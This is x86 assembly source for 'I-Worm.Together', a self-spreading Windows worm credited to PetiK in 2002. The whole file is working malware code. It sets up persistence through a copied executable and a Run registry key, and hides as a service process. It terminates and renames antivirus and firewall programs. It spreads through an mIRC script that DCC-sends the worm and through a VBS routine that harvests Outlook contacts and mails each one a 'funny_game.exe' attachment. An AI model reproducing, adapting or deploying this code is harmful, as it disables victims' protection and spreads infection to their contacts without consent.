comment # Name : I-Worm.Together Author : PetiK Date : March 10th 2002 - March 15th 2002 # .586p .model flat .code JUMPS api macro a extrn a:proc call a endm PROCESSENTRY32 STRUCT dwSize DWORD ? cntUsage DWORD ? th32ProcessID DWORD ? th32DefaultHeapID DWORD ? th32ModuleID DWORD ? cntThreads DWORD ? th32ParentProcessID DWORD ? pcPriClassBase DWORD ? dwFlags DWORD ? szExeFile db 260 dup(?) PROCESSENTRY32 ENDS include start_worm: call hide_worm twin_worm: push 50 mov esi,offset orig_worm push esi push 0 api GetModuleFileNameA ; esi = name of file push 50 push offset verif_worm api GetSystemDirectoryA @pushsz "\EBASE64.EXE" push offset verif_worm api lstrcat mov edi,offset copy_worm push edi push 50 push edi api GetSystemDirectoryA add edi,eax mov eax,"aBe\" stosd mov eax,"46es" stosd mov eax,"exe." stosd pop edi ; edi = %system%\eBase64.exe push offset orig_worm push offset verif_worm api lstrcmp test eax,eax jz continue_worm push 0 push edi push esi api CopyFileA ; copy file push 20 push edi push 1 @pushsz "Encode Base64" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h api SHSetValueA ; regedit jmp end_worm continue_worm: fuck_antivirus: @pushsz "OIFIL400.DLL" api LoadLibraryA test eax,eax jz end_fuck_antivirus push 0 push 2 api CreateToolhelp32Snapshot mov lSnapshot, eax inc eax jz end_fuck_antivirus lea eax,uProcess mov [eax.dwSize], SIZE PROCESSENTRY32 lea eax,uProcess push eax push lSnapshot api Process32First checkfile: test eax, eax jz InfExpRetCl push ecx mov eax,ProcessID push offset uProcess cmp eax,[uProcess.th32ProcessID] je NextFile lea ebx,[uProcess.szExeFile] verif macro verifname,empty local name ifnb %out too much arguments in macro 'nxt_instr' .err endif call name db verifname,0 name: push ebx api lstrstr test eax,eax endm verif "ARG" ; Norton jnz term verif "AVP32.EXE" ; AVP jnz term verif "AVPCC.EXE" ; AVP jnz term verif "AVPM.EXE" ; AVP jnz term verif "WFINDV32.EXE" jnz term verif "F-AGNT95.EXE" ; F-SECURE jnz term verif "NAVAPW32.EXE" ; Norton jnz term verif "NAVW32.EXE" ; Norton jnz term verif "NMAIN.EXE" jnz term verif "PAVSHED.EXE" ; PandaSoftware jnz term verif "vshwin32.exe" ; McAfee jnz term verif "PETIKSHOW.EXE" ; McAfee jnz term @pushsz "ZONEALARM.EXE" push ebx api lstrstr test eax,eax jz NextFile term: push [uProcess.th32ProcessID] push 1 push 001F0FFFh api OpenProcess test eax,eax jz NextFile push 0 push eax api TerminateProcess push ebx push offset new_name api lstrcpy mov esi,offset new_name push esi api lstrlen add esi,eax sub esi,4 mov [esi],"ktp." lodsd ; mov [esi],"kmz." ; lodsd push 0 push offset new_name push ebx api CopyFileA push ebx api DeleteFileA NextFile: push offset uProcess push lSnapshot api Process32Next jmp checkfile InfExpRetCl: push lSnapshot api CloseHandle end_fuck_antivirus: call Spread_Mirc call Spread_Worm e_s_w: end_worm: push 0 api ExitProcess hide_worm Proc pushad @pushsz "KERNEL32.DLL" api GetModuleHandleA xchg eax,ecx jecxz end_hide_worm @pushsz "RegisterServiceProcess" ; Registered as Service Process push ecx api GetProcAddress xchg eax,ecx jecxz end_hide_worm push 1 push 0 call ecx end_hide_worm: popad ret hide_worm EndP Spread_Mirc Proc push offset copy_worm push offset mirc_exe api lstrcpy call @mirc db "C:\mirc\script.ini",0 db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft. db "C:\progra~1\mirc\script.ini",0 db "C:\progra~1\mirc32\script.ini",0 @mirc: pop esi push 4 pop ecx mirc_loop: push ecx push 0 push 80h push 2 push 0 push 1 push 40000000h push esi api CreateFileA mov ebp,eax push 0 push offset byte_write @tmp_mirc: push e_mirc - s_mirc push offset s_mirc push ebp api WriteFile push ebp api CloseHandle @endsz pop ecx loop mirc_loop end_spread_mirc: ret Spread_Mirc EndP Spread_Worm Proc pushad push 50 push offset vbs_worm api GetSystemDirectoryA @pushsz "\eBase.vbs" push offset vbs_worm api lstrcat push 0 push 20h push 2 push 0 push 1 push 40000000h push offset vbs_worm api CreateFileA mov ebp,eax push 0 push offset byte_write push e_vbs - s_vbs push offset s_vbs push ebp api WriteFile push ebp api CloseHandle push 1 push 0 push 0 push offset vbs_worm @pushsz "open" push 0 api ShellExecuteA verif_inet: push 0 push offset inet api InternetGetConnectedState dec eax jnz verif_inet push 50 push offset t_ini api GetSystemDirectoryA @pushsz "\together.ini" push offset t_ini api lstrcat push 00h push 80h push 03h push 00h push 01h push 80000000h push offset t_ini api CreateFileA inc eax je end_spread_worm dec eax xchg eax,ebx xor eax,eax push eax push eax push eax push 2 push eax push ebx api CreateFileMappingA test eax,eax je end_s1 xchg eax,ebp xor eax,eax push eax push eax push eax push 4 push ebp api MapViewOfFile test eax,eax je end_s2 xchg eax,esi push 0 push ebx api GetFileSize cmp eax,4 jbe end_s3 scan_mail: xor edx,edx mov edi,offset mail_addr push edi p_c: lodsb cmp al," " je car_s cmp al,";" je end_m cmp al,"#" je f_mail cmp al,'@' jne not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c end_m: xor al,al stosb pop edi test edx,edx je scan_mail call send_mail jmp scan_mail f_mail: end_s3: push esi api UnmapViewOfFile end_s2: push ebp api CloseHandle end_s1: push ebx api CloseHandle end_spread_worm: popad jmp e_s_w Spread_Worm EndP send_mail: xor eax,eax push eax push eax push offset Message push eax push [sess] api MAPISendMail ret .data ; === Copy Worm === orig_worm db 50 dup (0) copy_worm db 50 dup (0) verif_worm db 50 dup (0) sysTime db 16 dup(0) ; === Fuck AntiVirus === uProcess PROCESSENTRY32 ProcessID dd ? lSnapshot dd ? new_name db 100 dup (?) ; === Spread With mIrc === s_mirc: db "[script]",CRLF db ";Don't edit this file.",CRLF,CRLF db "n0=on 1:JOIN:{",CRLF db "n1= /if ( $nick == $me ) { halt }",CRLF db "n2= /.dcc send $nick " mirc_exe db 50 dup (?) db CRLF,"n3=}",0 e_mirc: byte_write dd ? ; === Spread with Outlook === vbs_worm db 50 dup (0) t_ini db 50 dup (0) mail_addr db 128 dup (?) inet dd 0 sess dd 0 subject db "Re: Answer",0 body db "Here for you...",0 filename db "funny_game.exe",0 Message dd ? dd offset subject dd offset body dd ? dd ? dd ? dd 2 dd offset MsgFrom dd 1 dd offset MsgTo dd 1 dd offset Attach MsgFrom dd ? dd ? dd ? dd ? dd ? dd ? MsgTo dd ? dd 1 dd offset mail_addr dd offset mail_addr dd ? dd ? Attach dd ? dd ? dd ? dd offset orig_worm dd offset filename dd ? s_vbs: db 'On Error Resume Next',CRLF db 'Set fs=CreateObject("Scripting.FileSystemObject")',CRLF db 'Set sys=fs.GetSpecialFolder(1)',CRLF db 'Set c=fs.CreateTextFile(sys&"\together.ini")',CRLF db 'c.Close',CRLF db 'Set ou=CreateObject("Outlook.Application")',CRLF db 'Set map=ou.GetNameSpace("MAPI")',CRLF db 'adr=""',CRLF db 'For Each mel in map.AddressLists',CRLF db 'If mel.AddressEntries.Count <> 0 Then',CRLF db 'For O=1 To mel.AddressEntries.Count',CRLF db 'adr=adr &";"& mel.AddressEntries(O).Address',CRLF db 'Next',CRLF db 'End If',CRLF db 'Next',CRLF db 'adr=adr &";#"',CRLF,CRLF db 'Set c=fs.OpenTextFile(sys&"\together.ini",2)',CRLF db 'c.WriteLine adr',CRLF db 'c.Close',CRLF e_vbs: signature db "I-Worm.Together " author db "Coded by PetiK - 2002",00h end start_worm end